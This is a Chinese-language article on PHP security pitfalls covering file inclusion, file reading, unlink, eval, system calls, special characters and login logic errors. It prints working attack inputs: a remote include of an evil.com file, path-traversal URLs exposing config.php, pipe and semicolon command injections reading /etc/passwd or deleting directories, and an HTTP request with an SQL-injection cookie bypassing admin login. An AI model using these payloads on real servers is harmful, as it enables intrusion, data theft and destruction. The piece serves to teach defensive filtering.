重燃你的PHP安全之火

有人說(shuō)你們做php安全無(wú)非就是搞搞注入和跨站什么什么的，大錯(cuò)特錯(cuò)，如果這樣的話，一個(gè)magic_quotes_gpc或者服務(wù)器里的一些安全設(shè)置就讓我們?nèi)珱]活路了。我今天要說(shuō)的不是注入，不是跨站，而是存在于php程序中的一些安全細(xì)節(jié)問(wèn)題。OK!切入正題。

注意一些函數(shù)的過(guò)濾

有些函數(shù)在程序中是經(jīng)常使用的,像include(),require(),fopen(),fwrite(),readfile(),unlink(),eval()以及它們的變體函數(shù)等等。這些函數(shù)都很實(shí)用，實(shí)用并不代表讓你多省心，你還得為它們多費(fèi)點(diǎn)心。

1、include(),require()和fopen(),include_once(),require_once()這些都可以遠(yuǎn)程調(diào)用文件，對(duì)于它們的危害，google搜一下你就會(huì)很明了，對(duì)于所包含調(diào)用的變量沒過(guò)濾好，就可以任意包含文件從而去執(zhí)行。舉個(gè)例子，看print.php

以下為引用的內(nèi)容：
... 
if (empty ($bn) ) { //檢查是變量$bn是否為空 
include ("$cfg_dir/site_${site}.php"); //把$cfg_dir這個(gè)路徑里的site_${site}.php包含進(jìn)來(lái) 
... 

不管存不存在$cfg_dir目錄，$site這個(gè)變量你可以很自然的去使用，因?yàn)樗緵]檢查$site變量啊。可以把變量$site指定遠(yuǎn)程文件http://evil.com/cmd.gif去調(diào)用，也可以是本地的一個(gè)文件，你所指定的文件里寫上php的語(yǔ)句，然后它就去包含執(zhí)行這個(gè)含有php語(yǔ)句的文件了。

列出文件目錄

甚至可以擴(kuò)展到包含一些管理員文件，提升權(quán)限，典型的像以前phpwind,bo-blog的漏洞一樣。除了依靠php.ini里的allow_url_fopen設(shè)為off禁止遠(yuǎn)程使用文件和open_base_dir禁止使用目錄以外的文件外，你還得事先聲明好只能包含哪些文件，這里就不多說(shuō)廢話了。

2、fopen(),file(),readfile(),openfile(),等也是該特別留意的地方。函數(shù)本身并沒什么,它們的作用是去打開文件，可是如果對(duì)變量過(guò)濾不徹底的話，就會(huì)泄露源代碼。這樣的函數(shù)文本論壇里會(huì)有很多。

以下為引用的內(nèi)容：
... 
$articlearray=openfile("$dbpath/$fid/$tid.php"); //打開$dbpath/$fid這個(gè)路徑的$tid.php文件 
$topic_detail=explode("|",$articlearray[0]); //用分割符|讀出帖子的內(nèi)容 
... 

很眼熟吧，這是ofstar以前版本的read.php,$fid和$tid沒有任何過(guò)濾，$tid指定為某個(gè)文件提交，就發(fā)生了原代碼泄露。

http://explame.com/ofstar/read.php?fid=123&tid=../index

$tid會(huì)被加上php的后綴，所以直接寫index。這僅僅是個(gè)例子，接著看吧。

3、fwrite()和它的變體函數(shù)這種漏洞想想都想得出，對(duì)于用戶提交的字符沒過(guò)濾的話，寫入一段php后門又不是不可以。

4、unlink()函數(shù)，前段時(shí)間，phpwind里任意刪除文件就是利用這個(gè)函數(shù)，對(duì)于判斷是否刪除的變量沒過(guò)濾，變量可以指定為任意文件，當(dāng)然就可以刪除任意文件的變量。

5、eval(),preg_replace()函數(shù)，它們的作用是執(zhí)行php代碼，如果字符串沒被經(jīng)過(guò)任何過(guò)濾的話，會(huì)發(fā)生什么呢，我就常看見一些cms里面使用，想想，一句話的php木馬不就是根據(jù)eval()原理制作的嗎？

6、對(duì)于system()這些系統(tǒng)函數(shù)，你會(huì)說(shuō)在php.ini里禁止系統(tǒng)函數(shù)，對(duì)，這也是好辦法，可是象一些程序里需要，那是不是就不用了呢？就像上次我看到的一套很漂亮的php相冊(cè)一樣。另外對(duì)于popen(),proc_open(),proc_close()函數(shù)你也得特別注意，盡管他們執(zhí)行命令后并沒有直接的輸出，但你想這到底對(duì)黑客們有沒有用呢。再這里php提供提供了兩個(gè)函數(shù)，escapeshellarg(),escapeshellcmd(),這兩個(gè)函數(shù)用來(lái)對(duì)抗系統(tǒng)函數(shù)的調(diào)用攻擊，也就是過(guò)濾。

對(duì)于危害，來(lái)舉個(gè)例子，我們來(lái)看某論壇prod.php

以下為引用的內(nèi)容：
07 $doubleApp = isset($argv[1]); //初始化變量$doubleApp
... 
14 if( $doubleApp ) //if語(yǔ)句 
15 { 
16 $appDir = $argv[1]; //初始化$appDir 
17 system("mkdir $prodDir/$appDir"); //使用系統(tǒng)函數(shù)system來(lái)創(chuàng)建目錄$prodDir/$appDir 

本來(lái)是拿來(lái)創(chuàng)建$prodDir/$appDir目錄的，再接著看上去，程序僅僅檢測(cè)是否存在$argv[1]，缺少對(duì)$argv[1]的必要過(guò)濾，那么你就可以這樣 
/prod.php?argv[1]=|ls%20-la或者/prod.php?argv[1]=|cat%20/etc/passwd（分割符 | 在這里是UNIX的管道參數(shù)，可以執(zhí)行多條命令。）

到這里，常見的漏洞類型應(yīng)該知道點(diǎn)了吧。

對(duì)于特殊字符的重視

對(duì)于特殊字符，有句話叫All puts is invalid.外國(guó)人文章里這句話很常見的。所有輸入都是有害的。你永遠(yuǎn)不要對(duì)用戶所輸入的東西省心，為了對(duì)付這些危害，程序員都在忙著過(guò)濾大把大把的字符，唯恐漏了什么。而有些程序員呢？好像從沒注意過(guò)這些問(wèn)題，從來(lái)都是敞開漏洞大門的。不說(shuō)廢話，還是先看看下面這些東西吧。

1、其實(shí)程序的漏洞里最關(guān)鍵，最讓開發(fā)者放心不下的就是帶著$符號(hào)的美元符號(hào)，變量，對(duì)于找漏洞的人來(lái)說(shuō)，抓著變量?jī)蓚�(gè)字就是一切。就像目錄遍歷這個(gè)bug，很多郵件程序都存在，開發(fā)者考慮的很周全，有的甚至加上了網(wǎng)絡(luò)硬盤這個(gè)東西，好是好，就像http://mail.com/file.php?id=1&put=list&tid=1&file=./

要是我們把file這個(gè)變量換成./../甚至更上層呢？目錄就這樣被遍歷了。

2、尖括號(hào)"<>"跨站你不會(huì)不知道吧，一些搜索欄里，文章，留言，像前段時(shí)間phpwind附件那里的跨站等等。當(dāng)然，對(duì)于跨站問(wèn)題，你要過(guò)濾的遠(yuǎn)遠(yuǎn)不止尖括號(hào)。不怕過(guò)濾時(shí)漏掉什么，而是怕你想不起要去過(guò)濾。

3、斜桿和反斜桿：對(duì)于/和\的過(guò)濾，記得魔力論壇的附件下載處的原代碼泄露嗎？

attachment.php?id=684&u=3096&extension=gif&attach=.\..\..\..\..\..\..\includes\config.php&filename=1.gif

對(duì)于過(guò)濾.. / \的問(wèn)題，像windows主機(jī)不僅要過(guò)濾../還要過(guò)濾..\,windows主機(jī)對(duì)\會(huì)解析為/,這些細(xì)節(jié)跟SQL injection比起來(lái)，什么才叫深入呢？

4、對(duì)于反引號(hào)(``),反引號(hào)在php中很強(qiáng)大，它可以執(zhí)行系統(tǒng)命令，就像system()這些系統(tǒng)函數(shù)一樣，如果用戶的惡意語(yǔ)句被它所執(zhí)行的話就會(huì)危害服務(wù)器，我想除了服務(wù)器設(shè)置的很好以外，對(duì)于它們，你還是老老實(shí)實(shí)的過(guò)濾好吧。

5、對(duì)于換行符,NULL字符等等，像"\t,\x0B,\n,\r,\0這些，這些都是很有用的，像動(dòng)網(wǎng)以前的上傳漏洞就是因?yàn)樯蟼髦械腘ULL(\0)字符引起的，對(duì)于這些能隨意截?cái)喑绦蛄鞒痰淖址�，你說(shuō)我們?cè)跈z測(cè)的時(shí)候應(yīng)該有多細(xì)心呢？

6、分號(hào)(;)和分割符(|)

分號(hào)截?cái)喑绦蛄鞒�，shell_exec("del ./yourpath/$file"); //使用系統(tǒng)函數(shù)shell_exec刪除文件$file

變量$file沒指定，那么直接寫zizzy.php;del ./yourpath ,這樣你的yourpath目錄也就被del了。

分割符(|)是UNIX里自帶的管道函數(shù)，可以連接幾條命令來(lái)執(zhí)行。有時(shí)候加在過(guò)濾不嚴(yán)的系統(tǒng)函數(shù)中執(zhí)行。

邏輯錯(cuò)誤

驗(yàn)證不完全和一些邏輯錯(cuò)誤在程序里也很容易找到，特別是現(xiàn)在的程序員，只顧深入的學(xué)習(xí)，而對(duì)于邏輯錯(cuò)誤等等這樣的安全意識(shí)都沒有培養(yǎng)的意識(shí)，其實(shí)這是是靠自己去培養(yǎng)，而不是等著人來(lái)報(bào)告bug給你。對(duì)于邏輯錯(cuò)誤的判斷，我們只能說(shuō)，多練練吧，經(jīng)驗(yàn)才是最重要的。

1、對(duì)于登陸驗(yàn)證的問(wèn)題。舉個(gè)例子：我們看某論壇的admin.php片斷

它這里username 和 password好像不對(duì)勁吧，存在管理員的username和password就直接通過(guò)驗(yàn)證，那就意味著沒有用戶名，沒密碼也行吧。我們提交

以下為引用的內(nèi)GET /bbs/admin/index.php?page=general HTTP/1.1 
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */* 
Accept-Language: zh-cn 
Accept-Encoding: gzip, deflate 
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Maxthon) 
Host: 127.0.0.1 
Connection: Keep-Alive 
Cookie: username='or isnull(1/0) AND level=3/*; password=; 

服務(wù)器租用/服務(wù)器托管中國(guó)五強(qiáng)！虛擬主機(jī)域名注冊(cè)頂級(jí)提供商！15年品質(zhì)保障！--億恩科技[ENKJ.COM]